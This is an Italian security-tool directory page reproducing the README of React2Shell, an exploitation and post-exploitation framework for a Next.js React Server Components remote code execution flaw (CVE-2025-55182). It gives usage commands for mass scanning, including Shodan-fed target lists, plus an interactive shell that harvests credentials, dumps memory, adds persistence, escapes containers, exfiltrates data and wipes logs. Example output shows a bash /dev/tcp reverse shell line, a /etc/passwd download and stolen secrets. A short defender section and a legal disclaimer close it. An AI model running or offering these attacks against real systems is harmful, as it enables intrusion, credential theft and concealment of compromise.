Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
React2Shell — R2S è un framework completo di sfruttamento e post-sfruttamento che mira alla vulnerabilità Next.js React Server Components (CVE-2025-55182). Fornisce una shell interattiva con funzionalità avanzate per il penetration testing, tra cui trasferimento di file, persistenza, enumerazione, controlli di escalation dei privilegi e altro. | Kitploit
Strumenti/GitHubGitHub/4nuxd/react2shell
Frameworks per Penetration TestingEscalation di PrivilegiFramework di ExploitMeccanismi di PersistenzaMovimento LateraleSfruttamento di Applicazioni WebEsfiltrazione DatiPost-ExploitCommand and ControlEscape dal Container
GitHub
439 mesi faNon ancora revisionato
4nuxd/react2shell

React2Shell

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

R2S è un framework completo di sfruttamento e post-sfruttamento che mira alla vulnerabilità Next.js React Server Components (CVE-2025-55182). Fornisce una shell interattiva con funzionalità avanzate per il penetration testing, tra cui trasferimento di file, persistenza, enumerazione, controlli di escalation dei privilegi e altro.

Condividi

🚀 R2S - Framework di Exploit per Next.js RSC

Version Python License CVE

Framework Avanzato di Post-Exploitation per RCE su React Server Components di Next.js

Caratteristiche • Installazione • Utilizzo • Comandi • Esempi


📋 Panoramica

R2S è un framework completo di exploitation e post-exploitation che sfrutta la vulnerabilità dei React Server Components di Next.js (CVE-2025-55182). Fornisce una shell interattiva con funzionalità avanzate per il penetration testing, tra cui trasferimento file, persistenza, enumerazione, controlli di escalation dei privilegi e molto altro.

🎯 Capacità Chiave

  • ✅ Scansione automatica delle vulnerabilità - Scansione di massa di più target
  • ✅ Shell RCE interattiva - Esecuzione di comandi con stato e navigazione delle directory
  • ✅ Trasferimento file basato su HTTP - Carica/scarica file senza limitazioni di base64
  • ✅ Automazione della reverse shell - Prova oltre 25 diversi payload di reverse shell
  • ✅ Enumerazione avanzata - Sistema, rete, container e metadati cloud
  • ✅ Escalation dei privilegi - Rilevamento automatico dei vettori di privesc
  • ✅ Raccolta di credenziali - Estrazione di password, chiavi, token e segreti
  • ✅ Meccanismi di persistenza - Mantenere l'accesso attraverso i riavvii
  • ✅ Movimento laterale - Scoprire e spostarsi verso altri host
  • ✅ Fuga dal container - Verifica dei vettori di breakout Docker/Kubernetes
  • ✅ Esfiltrazione dati - Estrazione di file e configurazioni sensibili
  • ✅ Operazioni stealth - Pulizia dei log e occultamento delle tracce

  • 🔥 Caratteristiche

    🌐 Exploit Principale

    • Scansione di massa con supporto multi-threading
    • Modalità pipeline per l'integrazione con altri strumenti
    • Rilevamento automatico delle vulnerabilità per Next.js RSC
    • Shell interattiva con stato e directory di lavoro persistente

    📁 Operazioni sui File

    • Caricamento basato su HTTP - Trasferisci file al target tramite wget/curl
    • Download basato su HTTP - Esfiltra file tramite richieste POST
    • Nessuna limitazione di dimensione - Funziona con file grandi (a differenza dei metodi base64)
    • Server HTTP automatico - Si avvia/ferma secondo necessità

    🔍 Ricognizione ed Enumerazione

    • Enumerazione del sistema - SO, kernel, utenti, processi
    • Scoperta della rete - Interfacce, route, ARP, DNS, porte in ascolto
    • Rilevamento dei container - Identificazione Docker, Kubernetes, LXC
    • Metadati cloud - Estrazione di credenziali AWS, GCP, Azure
    • Dump della memoria di processo - Estrazione di segreti dai processi in esecuzione
    • Scoperta di file interessanti - SUID, directory scrivibili, backup, configurazioni

    🔐 Raccolta di Credenziali

    • Variabili d'ambiente (password, chiavi API, token)
    • File .env e file di configurazione
    • Chiavi private SSH e authorized_keys
    • Cronologia Bash con comandi sensibili
    • File di database (SQLite, dump MySQL)
    • Credenziali cloud (AWS, Azure, GCP)
    • Credenziali Git e token NPM
    • Dati del browser (cookie, dati di login)
    • Segreti Docker e Kubernetes

    ⬆️ Escalation dei Privilegi

    • Rilevamento di binari SUID/SGID
    • Enumerazione dei permessi sudo
    • File di sistema scrivibili (/etc/passwd, /etc/shadow)
    • Controlli dell'accesso al socket Docker
    • Analisi delle capacità Linux
    • Suggerimenti di exploit per il kernel
    • Enumerazione dei cron job
    • Opportunità di hijacking del PATH

    🔄 Post-Exploitation

    • Meccanismi di persistenza - Cron job, .bashrc, servizi systemd
    • Persistenza avanzata - LD_PRELOAD, timer systemd
    • Scansione delle porte - Ricognizione della rete interna
    • Movimento laterale - Scoperta di chiavi SSH, analisi di known_hosts
    • Fuga dal container - Verifica dei container privilegiati, analisi delle capacità
    • Esfiltrazione dati - Raccolta automatica di dati sensibili
    • Automazione della reverse shell - Oltre 25 tipi di payload con tentativi automatici

    🥷 Stealth ed Evasione

    • Pulizia dei log - Cronologia Bash, log di autenticazione, syslog
    • Copertura delle tracce - Pulizia di wtmp, lastlog
    • Gestione delle sessioni - Salva e riprendi le sessioni

    🛠️ Installazione

    Prerequisiti

    root@kitploit:~
    # Python 3.6 o superiore
    python3 --version
    
    # Installa le dipendenze
    pip3 install requests urllib3
    

    Avvio Rapido

    root@kitploit:~
    # Clona o scarica lo strumento
    cd r2s-main
    
    # Rendi eseguibile (opzionale)
    chmod +x r2s_enhanced.py
    
    # Esegui lo strumento
    python3 r2s_enhanced.py -h
    

    🚀 Utilizzo

    Sintassi Base

    root@kitploit:~
    python3 r2s_enhanced.py [OPZIONI]
    

    Opzioni della Righe di Comando

    OpzioneDescrizionePredefinito
    -u, --urlURL di un singolo target-
    -l, --listFile contenente l'elenco di URL-
    -c, --cmdComando iniziale da eseguireid
    -t, --threadsNumero di thread di scansione30
    -p, --proxyProxy HTTP (es. http://127.0.0.1:8080)-
    -v, --verboseAbilita output dettagliatoFalse
    --http-portPorta del server HTTP per il trasferimento file8000

    Metodi di Input

    1. Singolo Target

    root@kitploit:~
    python3 r2s_enhanced.py -u http://target.com
    

    2. Target Multipli (File)

    root@kitploit:~
    python3 r2s_enhanced.py -l targets.txt -t 50
    

    3. Modalità Pipeline (stdin)

    root@kitploit:~
    cat targets.txt | python3 r2s_enhanced.py
    shodan search "Next.js" | python3 r2s_enhanced.py
    subfinder -d example.com | httpx | python3 r2s_enhanced.py
    

    💻 Comandi della Shell Interattiva

    Una volta ottenuto l'accesso RCE, entrerai in una shell interattiva con questi comandi:

    📂 Trasferimento File

    root@kitploit:~
    upload <file_locale> <percorso_remoto>    # Carica file sul target
    download <file_remoto> <percorso_locale>  # Scarica file dal target
    

    🧭 Navigazione

    root@kitploit:~
    cd <directory>                            # Cambia directory di lavoro
    pwd                                       # Mostra la directory di lavoro
    

    🔍 Enumerazione

    root@kitploit:~
    enum                                      # Enumerazione completa del sistema
    privesc                                   # Controlli di escalation dei privilegi
    harvest                                   # Raccolta di credenziali
    portscan <ip>                             # Scansiona le porte della rete interna
    memdump [pid]                             # Dump della memoria di processo per segreti
    

    🎯 Post-Exploitation

    root@kitploit:~
    lateral                                   # Opportunità di movimento laterale
    escape                                    # Vettori di fuga dal container
    exfil [tipo]                              # Esfiltra dati (env/config/keys/db/logs/all)
    reverse <lhost> <lport>                   # Prova più payload di reverse shell
    

    🔒 Persistenza

    root@kitploit:~
    persist                                   # Aggiungi persistenza base
    advpersist                                # Aggiungi persistenza avanzata
    

    🥷 Stealth

    root@kitploit:~
    stealth                                   # Pulisci i log e nascondi le tracce
    

    💾 Gestione Sessioni

    root@kitploit:~
    save                                      # Salva la sessione corrente
    help, ?                                   # Mostra il messaggio di aiuto
    exit, quit                                # Esci dalla shell interattiva
    

    🖥️ Comandi di Sistema

    Esegui qualsiasi comando shell direttamente:

    root@kitploit:~
    whoami
    id
    uname -a
    ps aux
    netstat -tulpn
    cat /etc/passwd
    

    📚 Esempi

    Esempio 1: Exploit Base

    root@kitploit:~
    $ python3 r2s_enhanced.py -u http://vulnerable-app.com
    
        _   __          __  ____            
       / | / /__  _  __/ /_/ __ \________   
      /  |/ / _ \| |/_/ __/ /_/ / ___/ _ \  
     / /|  /  __/>  </_ _/ _, _/ /__/  __/  
    /_/ |_/\___/_/|_|\__/_/ |_|\___/\___/   
    
       Next.js RSC Exploit Tool (CVE-2025-55182)
       Mass Scanner & Pipeline Edition (v4.1.0 - Enhanced)
    
       >> CREDIT( G4rxd )
    
    [*] Caricato 1 target. Avvio scansione con 30 thread...
    [*] Comando del payload: id
    
    [VULN] http://vulnerable-app.com >>> RCE SUCCESSO
           Output: uid=1000(node) gid=1000(node) groups=1000(node)
    
    [+] Shell RCE interattiva con stato avviata. Digita 'help' per i comandi.
    [*] Funzionalità avanzate: enum, privesc, persist, portscan, harvest, stealth
    [*] Nuove funzionalità: memdump, lateral, escape, exfil, advpersist, reverse
    
    [+] Server HTTP avviato su 192.168.1.100:8000
    
    next-rce:/app$
    

    Esempio 2: Enumerazione del Sistema

    root@kitploit:~
    next-rce:/app$ enum
    
    [*] Avvio enumerazione automatica...
    
    ============================================================
    [*] Info Sistema
    ============================================================
    Linux 5.15.0-91-generic #101-Ubuntu SMP x86_64 GNU/Linux
    NAME="Ubuntu"
    VERSION="22.04.3 LTS (Jammy Jellyfish)"
    
    ============================================================
    [*] Utente Corrente
    ============================================================
    node
    uid=1000(node) gid=1000(node) groups=1000(node),27(sudo)
    
    ============================================================
    [*] Rilevamento Container
    ============================================================
    12:devices:/docker/a1b2c3d4e5f6
    11:cpuset:/docker/a1b2c3d4e5f6
    [Container Docker rilevato]
    
    ...
    

    Esempio 3: Trasferimento File

    root@kitploit:~
    # Carica un file
    next-rce:/app$ upload /tmp/exploit.sh /var/tmp/exploit.sh
    [*] Caricamento /tmp/exploit.sh (2048 byte) tramite HTTP...
    [+] Caricamento riuscito!
        -rwxr-xr-x 1 node node 2048 Dec 12 03:28 /var/tmp/exploit.sh
    
    # Scarica un file
    next-rce:/app$ download /etc/passwd ./passwd.txt
    [*] Download di /etc/passwd tramite HTTP...
    [+] Download riuscito! (1523 byte)
        Salvato in: ./passwd.txt
    

    Esempio 4: Raccolta di Credenziali

    root@kitploit:~
    next-rce:/app$ harvest
    
    [*] Raccolta credenziali...
    
    [*] Variabili d'Ambiente:
    DATABASE_PASSWORD=super_secret_pass
    API_KEY=sk-1234567890abcdef
    AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
    
    [*] File .env:
    /app/.env
    /app/.env.production
    /var/www/.env.local
    
    [*] Chiavi SSH:
    /home/node/.ssh/id_rsa
    /root/.ssh/id_rsa
    
    ...
    

    Esempio 5: Reverse Shell

    root@kitploit:~
    next-rce:/app$ reverse 192.168.1.100 4444
    
    [*] Avvio tentativi di reverse shell verso 192.168.1.100:4444
    [!] Assicurati di avere un listener in esecuzione: nc -lvnp 4444
    
    [*] Provo 25 diversi payload di reverse shell...
    
    [1/25] Provo Bash TCP... ✓ Eseguito
    [?] Hai ricevuto una connessione? (y/n/s per fermare): y
    
    [+] SUCCESSO! Reverse shell stabilita usando: Bash TCP
    [*] Payload: bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
    

    Esempio 6: Scansione di Massa

    root@kitploit:~
    $ cat targets.txt
    http://app1.example.com
    http://app2.example.com
    http://app3.example.com
    
    $ python3 r2s_enhanced.py -l targets.txt -t 50
    
    [*] Caricati 3 target. Avvio scansione con 50 thread...
    
    [VULN] http://app1.example.com >>> RCE SUCCESSO
    [VULN] http://app3.example.com >>> RCE SUCCESSO
    
    [*] Scansione completata.
    

    Esempio 7: Controllo Escalation dei Privilegi

    root@kitploit:~
    next-rce:/app$ privesc
    
    [*] Verifica vettori di escalation dei privilegi...
    
    [*] Binari SUID:
    /usr/bin/sudo
    /usr/bin/passwd
    /usr/bin/mount
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    
    [*] Permessi Sudo:
    L'utente node può eseguire i seguenti comandi:
        (ALL : ALL) NOPASSWD: /usr/bin/docker
    
    [*] Socket Docker:
    srw-rw---- 1 root docker 0 Dec 12 03:28 /var/run/docker.sock
    
    [*] Gruppo Docker:
    Nel gruppo docker - SFRUTTABILE!
    
    ...
    

    Esempio 8: Fuga dal Container

    root@kitploit:~
    next-rce:/app$ escape
    
    [*] Verifica vettori di fuga dal container...
    
    [*] Tipo di Container:
    12:devices:/docker/a1b2c3d4e5f6
    
    [*] Container Privilegiato:
    PRIVILEGIATO
    
    [*] Socket Docker:
    srw-rw---- 1 root docker 0 Dec 12 03:28 /var/run/docker.sock
    
    [*] Capacità:
    CapPrm: 0000003fffffffff
    CapEff: 0000003fffffffff
    [Capacità complete - il container è privilegiato]
    
    ...
    

    🔧 Funzionalità Avanzate

    Payload di Reverse Shell

    Lo strumento include oltre 25 payload di reverse shell in più linguaggi e tecniche:

    • Bash (TCP, UDP, varianti exec)
    • Netcat (tradizionale, mkfifo, OpenBSD)
    • Python/Python3 (socket, pty)
    • Perl (varianti multiple)
    • PHP (exec, system, passthru)
    • Ruby (varianti socket)
    • Node.js (child_process, socket)
    • Socat, Telnet, AWK
    • Golang, OpenSSL

    Estrazione di Metadati Cloud

    Rileva automaticamente ed estrae credenziali da:

    • AWS - Ruoli IAM, credenziali di sicurezza
    • GCP - Token dell'account di servizio
    • Azure - Metadati dell'istanza
    • Variabili d'ambiente con credenziali cloud

    Rilevamento dei Container

    Identifica e analizza:

    • Container Docker
    • Pod Kubernetes
    • Container LXC
    • Privilegiati vs non privilegiati
    • Vettori di fuga disponibili

    ⚠️ Disclaimer Legale

    SOLO PER SCOPI EDUCATIVI E TEST AUTORIZZATI

    Questo strumento è fornito esclusivamente per scopi educativi e per penetration testing autorizzato. L'utilizzo di questo strumento per attaccare target senza previo consenso reciproco è illegale. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento.

    Requisiti per un uso legale:

    • ✅ Autorizzazione scritta dal proprietario del target
    • ✅ Ambito e regole di ingaggio definiti
    • ✅ Incarico professionale di penetration testing
    • ❌ Accesso non autorizzato ai sistemi
    • ❌ Intento malevolo o danno

    🛡️ Rilevamento e Difesa

    Per i Difensori

    Rilevamento:

    • Monitora intestazioni Next-Action insolite
    • Cerca richieste POST multipart/form-data verso endpoint inesistenti
    • Controlla output di comandi codificati in base64 nelle risposte di errore
    • Monitora child_process.execSync nei log di Next.js

    Mitigazione:

    • Aggiorna Next.js all'ultima versione patchata
    • Implementa regole di Web Application Firewall (WAF)
    • Limita l'esecuzione di codice lato server
    • Monitora e registra tutte le richieste RSC
    • Implementa una corretta validazione dell'input

    📊 Cronologia Versioni

    v4.1.0 (Corrente) - Edizione Migliorata

    • ✅ Aggiunta automazione della reverse shell (oltre 25 payload)
    • ✅ Aggiunte capacità di dump della memoria
    • ✅ Aggiunta scoperta di movimento laterale
    • ✅ Aggiunti controlli di fuga dal container
    • ✅ Aggiunta automazione dell'esfiltrazione dati
    • ✅ Aggiunti meccanismi di persistenza avanzata
    • ✅ Migliorato il trasferimento file HTTP
    • ✅ Migliorate le funzionalità di enumerazione
    • ✅ Migliore gestione degli errori e UX

    v4.0.0 - Framework di Post-Exploitation

    • ✅ Trasferimento file basato su HTTP
    • ✅ Meccanismi di persistenza
    • ✅ Scansione porte
    • ✅ Controlli di escalation dei privilegi
    • ✅ Enumerazione della rete
    • ✅ Raccolta di credenziali
    • ✅ Gestione delle sessioni
    • ✅ Enumerazione automatica
    • ✅ Funzionalità stealth

    v3.0.0 - Shell Interattiva

    • Shell con stato e navigazione delle directory
    • Trasferimento file base (base64)
    • Migliore gestione degli errori

    🤝 Contributi

    I contributi sono benvenuti! Assicurati che tutti i contributi siano per scopi educativi e di sicurezza difensiva.


    👨‍💻 Autore

    G4rxd


    🙏 Riconoscimenti

    • Team di scoperta CVE-2025-55182
    • Community di Ricerca sulla Sicurezza di Next.js
    • Community di Strumenti di Sicurezza Open Source

    📄 Licenza

    Questo progetto è concesso in licenza per soli scopi educativi e test autorizzati.


    ⚡ Buon Ethical Hacking! ⚡

    Ricorda: Da un grande potere derivano grandi responsabilità.

    Scarica lo strumento